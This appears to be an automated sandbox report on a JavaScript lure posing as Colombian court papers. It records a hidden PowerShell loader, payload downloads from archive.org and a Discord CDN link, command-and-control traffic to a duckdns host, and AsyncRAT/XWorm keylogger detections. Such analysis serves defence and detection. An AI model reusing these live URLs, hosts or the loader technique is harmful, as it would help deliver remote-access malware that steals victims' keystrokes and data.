              Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
              Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsArgument value : ['"powershell -nop -w hidden -c "$embolic = \'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAM']
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFC3DAAB913h2_2_00007FFC3DAAB8A5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFC3DAAE464h2_2_00007FFC3DAAE3D8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.233.30:443 -> 192.168.2.4:49720
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 162.159.134.233:443 -> 192.168.2.4:49723
              Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 162.159.134.233:443 -> 192.168.2.4:49723
              Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 162.159.134.233:443 -> 192.168.2.4:49723
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: unknownDNS query: name: envio2333.duckdns.org
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: global trafficTCP traffic: 192.168.2.4:49725 -> 146.70.50.42:3030
              Source: global trafficHTTP traffic detected: GET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 207.241.233.30 207.241.233.30
              Source: Joe Sandbox ViewIP Address: 207.241.224.2 207.241.224.2
              Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
              Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.12.131
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.12.131
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: archive.org
              Source: global trafficDNS traffic detected: DNS query: ia801700.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
              Source: global trafficDNS traffic detected: DNS query: envio2333.duckdns.org
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
              Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.org
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.org/download/new_image_20250413/new_image.jpg
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=
              Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia801700.us.archive.org
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
              Source: powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: MSBuild.exe, 0000000B.00000002.2432254374.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/xworm_v2
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.4:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49723 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, LimeLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
